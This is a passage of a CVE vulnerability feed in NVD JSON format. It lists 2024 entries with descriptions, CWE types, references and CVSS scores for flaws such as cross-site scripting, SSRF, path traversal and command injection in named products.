IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281022", "name" : "VDB-281022 | code-projects Pharmacy Management System Manage Supplier Page manage_supplier.php cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.426884", "name" : "Submit #426884 | code-projects Pharmacy Management System 1.0 Basic Cross Site Scripting", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file /manage_supplier.php of the component Manage Supplier Page. The manipulation of the argument address leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:pharmacy_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-21T01:15Z", "lastModifiedDate" : "2024-10-23T14:14Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10198", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/93343006341d3799de0cb8912cc328ec", "name" : "https://gist.github.com/higordiego/93343006341d3799de0cb8912cc328ec", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281023", "name" : "VDB-281023 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.281023", "name" : "VDB-281023 | code-projects Pharmacy Management System Manage Customer Page manage_customer.php cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.426885", "name" : "Submit #426885 | code-projects Pharmacy Management System 1.0 Cross Site Scripting", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /manage_customer.php of the component Manage Customer Page. The manipulation of the argument suppliers_name/address leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions contradicting files to be affected. Other parameters might be affected as well." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:pharmacy_management:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-21T02:15Z", "lastModifiedDate" : "2024-10-22T15:39Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10199", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/0dae6dd4a36acd12bcc408caf1c787d9", "name" : "https://gist.github.com/higordiego/0dae6dd4a36acd12bcc408caf1c787d9", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281024", "name" : "VDB-281024 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.281024", "name" : "VDB-281024 | code-projects Pharmacy Management System Manage Medicines Page manage_medicine.php cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.426916", "name" : "Submit #426916 | code-projects Pharmacy Management System 1.0 Cross Site Scripting", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /manage_medicine.php of the component Manage Medicines Page. The manipulation of the argument name/address/doctor_address/suppliers_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions contradicting files to be affected." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:pharmacy_management:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-21T02:15Z", "lastModifiedDate" : "2024-10-22T15:40Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1020", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.252289", "name" : "https://vuldb.com/?ctiid.252289", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252289", "name" : "https://vuldb.com/?id.252289", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.yuque.com/mailemonyeyongjuan/tha8tr/gdd3hiwz8uo6ylab", "name" : "https://www.yuque.com/mailemonyeyongjuan/tha8tr/gdd3hiwz8uo6ylab", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252289", "name" : "https://vuldb.com/?ctiid.252289", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://www.yuque.com/mailemonyeyongjuan/tha8tr/gdd3hiwz8uo6ylab", "name" : "https://www.yuque.com/mailemonyeyongjuan/tha8tr/gdd3hiwz8uo6ylab", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252289", "name" : "https://vuldb.com/?id.252289", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic was found in Rebuild up to 3.5.5. Affected by this vulnerability is the function getStorageFile of the file /filex/proxy-download. The manipulation of the argument url leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252289 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:*", "versionEndIncluding" : "3.5.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-29T22:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10200", "ASSIGNER" : "cve@cert.org.tw" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.twcert.org.tw/en/cp-139-8158-dadbc-2.html", "name" : "https://www.twcert.org.tw/en/cp-139-8158-dadbc-2.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.twcert.org.tw/tw/cp-132-8159-0f7a2-1.html", "name" : "https://www.twcert.org.tw/tw/cp-132-8159-0f7a2-1.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Administrative Management System from Wellchoose has a Path Traversal vulnerability, allowing unauthenticated remote attackers to exploit this vulnerability to download arbitrary files on the server." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wellchoose:administrative_management_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-10-21T04:15Z", "lastModifiedDate" : "2024-10-24T13:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10201", "ASSIGNER" : "cve@cert.org.tw" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.twcert.org.tw/en/cp-139-8161-b8a6d-2.html", "name" : "https://www.twcert.org.tw/en/cp-139-8161-b8a6d-2.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.twcert.org.tw/tw/cp-132-8160-756b6-1.html", "name" : "https://www.twcert.org.tw/tw/cp-132-8160-756b6-1.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Administrative Management System from Wellchoose does not properly validate uploaded file types, allowing remote attackers with regular privileges to upload and execute webshells." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wellchoose:administrative_management_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-10-21T04:15Z", "lastModifiedDate" : "2024-10-24T13:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10202", "ASSIGNER" : "cve@cert.org.tw" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.twcert.org.tw/en/cp-139-8163-b701e-2.html", "name" : "https://www.twcert.org.tw/en/cp-139-8163-b701e-2.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.twcert.org.tw/tw/cp-132-8162-dc491-1.html", "name" : "https://www.twcert.org.tw/tw/cp-132-8162-dc491-1.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Administrative Management System from Wellchoose has an OS Command Injection vulnerability, allowing remote attackers with regular privileges to inject and execute arbitrary OS commands." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wellchoose:administrative_management_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-10-21T04:15Z", "lastModifiedDate" : "2024-10-24T13:55Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10203", "ASSIGNER" : "cna@manageengine.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.manageengine.com/products/desktop-central/cve-2024-10203.html", "name" : "https://www.manageengine.com/products/desktop-central/cve-2024-10203.html", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Zohocorp ManageEngine EndPoint Central versions 11.3.2416.21 and below, 11.3.2428.9 and below are vulnerable to Arbitrary File Deletion in the agent installed machines." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-07T10:15Z", "lastModifiedDate" : "2024-11-08T19:01Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10204", "ASSIGNER" : "3DS.Information-Security@3ds.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.3ds.com/vulnerability/advisories", "name" : "https://www.3ds.com/vulnerability/advisories", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Heap-based Buffer Overflow and Uninitialized Variable vulnerabilities exist in the X_B and SAT file reading procedure in eDrawings from Release SOLIDWORKS 2024 through Release SOLIDWORKS 2025. These vulnerabilities could allow an attacker to execute arbitrary code while opening a specially crafted X_B or SAT file." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-19T14:15Z", "lastModifiedDate" : "2024-11-19T21:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10205", "ASSIGNER" : "hirt@hitachi.co.jp" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-151/index.html", "name" : "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-151/index.html", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Authentication Bypass\nvulnerability in Hitachi Ops Center Analyzer on Linux, 64 bit (Hitachi Ops Center Analyzer detail view component), Hitachi Infrastructure Analytics Advisor on Linux, 64 bit (Hitachi Data Center Analytics \n\ncomponent\n\n).This issue affects Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.3-00; Hitachi Infrastructure Analytics Advisor: from 2.1.0-00 through 4.4.0-00." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-12-17T02:15Z", "lastModifiedDate" : "2024-12-17T02:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10206", "ASSIGNER" : "cybersecurity@ch.abb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-918" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.br-automation.com/fileadmin/SA24P015-77573c08.pdf", "name" : "https://www.br-automation.com/fileadmin/SA24P015-77573c08.pdf", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A Server-Side Request Forgery vulnerability in the APROL Web Portal used in B&R APROL <4.4-00P5 may allow an unauthenticated network-based attacker to force the web server to request arbitrary URLs." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-25T05:15Z", "lastModifiedDate" : "2025-03-25T05:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10207", "ASSIGNER" : "cybersecurity@ch.abb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-918" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.br-automation.com/fileadmin/SA24P015-77573c08.pdf", "name" : "https://www.br-automation.com/fileadmin/SA24P015-77573c08.pdf", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A Server-Side Request Forgery vulnerability in the APROL Web Portal used in B&R APROL <4.4-00P5 may allow an authenticated network-based attacker to force the web server to request arbitrary URLs." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-25T05:15Z", "lastModifiedDate" : "2025-03-25T05:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10208", "ASSIGNER" : "cybersecurity@ch.abb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.br-automation.com/fileadmin/SA24P015-77573c08.pdf", "name" : "https://www.br-automation.com/fileadmin/SA24P015-77573c08.pdf", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An Improper Neutralization of Input During Web Page Generation vulnerability in the APROL Web Portal used in B&R APROL <4.4-00P5 may allow an authenticated network-based attacker to insert malicious code which is then executed in the context of the user’s browser session." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-25T05:15Z", "lastModifiedDate" : "2025-03-25T05:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10209", "ASSIGNER" : "cybersecurity@ch.abb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-732" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.br-automation.com/fileadmin/SA24P015-77573c08.pdf", "name" : "https://www.br-automation.com/fileadmin/SA24P015-77573c08.pdf", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An Incorrect Permission Assignment for Critical Resource vulnerability in the file system used in B&R APROL <4.4-01 may allow an authenticated local attacker to read and alter the configuration of another engineering or runtime user." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-25T05:15Z", "lastModifiedDate" : "2025-03-25T05:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1021", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-918" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.252290", "name" : "https://vuldb.com/?ctiid.252290", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252290", "name" : "https://vuldb.com/?id.252290", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.yuque.com/mailemonyeyongjuan/tha8tr/yemvnt5uo53gfem5", "name" : "https://www.yuque.com/mailemonyeyongjuan/tha8tr/yemvnt5uo53gfem5", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252290", "name" : "https://vuldb.com/?ctiid.252290", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://www.yuque.com/mailemonyeyongjuan/tha8tr/yemvnt5uo53gfem5", "name" : "https://www.yuque.com/mailemonyeyongjuan/tha8tr/yemvnt5uo53gfem5", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252290", "name" : "https://vuldb.com/?id.252290", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in Rebuild up to 3.5.5. Affected by this issue is the function readRawText of the component HTTP Request Handler. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252290 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:*", "versionEndIncluding" : "3.5.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T22:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10210", "ASSIGNER" : "cybersecurity@ch.abb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-73" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.br-automation.com/fileadmin/SA24P015-77573c08.pdf", "name" : "https://www.br-automation.com/fileadmin/SA24P015-77573c08.pdf", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An External Control of File Name or Path vulnerability in the APROL Web Portal used in B&R APROL <4.4-005P may allow an authenticated network-based attacker to access data from the file system." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-25T06:15Z", "lastModifiedDate" : "2025-03-25T06:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10212", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-07-05T23:15Z", "lastModifiedDate" : "2025-07-05T23:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10214", "ASSIGNER" : "responsibledisclosure@mattermost.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mattermost.com/security-updates", "name" : "https://mattermost.com/security-updates", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Mattermost versions 9.11.X <= 9.11.1, 9.5.x <= 9.5.9 icorrectly issues two sessions when using desktop SSO - one in the browser and one in desktop with incorrect settings." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mattermost:mattermost:*:*:*:*:*:*:*:*", "versionStartIncluding" : "9.5.0", "versionEndIncluding" : "9.5.9", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mattermost:mattermost:*:*:*:*:*:*:*:*", "versionStartIncluding" : "9.11.0", "versionEndIncluding" : "9.11.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 3.5, "baseSeverity" : "LOW" }, "exploitabilityScore" : 2.1, "impactScore" : 1.4 } }, "publishedDate" : "2024-10-28T15:15Z", "lastModifiedDate" : "2024-11-05T17:03Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10215", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-639" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://documentation.iqonic.design/wpbookit/versions/change-log", "name" : "https://documentation.iqonic.design/wpbookit/versions/change-log", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2d23a2b9-8476-4564-a5de-5e6cfc38ce68?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2d23a2b9-8476-4564-a5de-5e6cfc38ce68?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WPBookit plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 1.6.4. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:iqonic:wpbookit:*:*:*:*:pro:wordpress:*:*", "versionEndExcluding" : "1.6.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2025-01-09T20:15Z", "lastModifiedDate" : "2025-06-27T17:37Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10216", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/vendor-dist/htmlburger/carbon-fields/core/Libraries/Sidebar_Manager/Sidebar_Manager.php#L102", "name" : "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/vendor-dist/htmlburger/carbon-fields/core/Libraries/Sidebar_Manager/Sidebar_Manager.php#L102", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/vendor-dist/htmlburger/carbon-fields/core/Libraries/Sidebar_Manager/Sidebar_Manager.php#L79", "name" : "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/vendor-dist/htmlburger/carbon-fields/core/Libraries/Sidebar_Manager/Sidebar_Manager.php#L79", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3194404/wp-user-manager/trunk/includes/class-wp-user-manager.php", "name" : "https://plugins.trac.wordpress.org/changeset/3194404/wp-user-manager/trunk/includes/class-wp-user-manager.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3ab4e9c6-68b0-4113-bff0-c1d3c2d3dea4?source=cve", "name" : 